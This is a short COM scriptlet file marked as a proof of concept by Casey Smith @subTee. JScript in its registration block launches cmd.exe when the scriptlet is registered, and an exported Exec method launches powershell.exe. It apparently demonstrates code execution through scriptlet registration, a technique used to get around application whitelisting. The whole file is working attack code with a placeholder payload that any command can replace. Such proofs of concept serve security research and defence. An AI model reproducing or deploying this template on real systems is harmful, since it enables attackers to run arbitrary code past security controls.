<?XML version="1.0"?>
<scriptlet>

<registration
    progid="EDRCC"
    version="1.00"
    classid="{FAF01011-0000-0000-0000-0000F11EDFCC}"
	>
	<!-- Proof Of Concept - Casey Smith @subTee -->
        
	<script language="JScript">
		<![CDATA[

			var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");

		]]>
	</script>
</registration>

<public>
    <method name="Exec"></method>
</public>
<script language="JScript">
<![CDATA[

	function Exec()
	{
		var r = new ActiveXObject("WScript.Shell").Run("powershell.exe");
	}

]]>
</script>

</scriptlet>
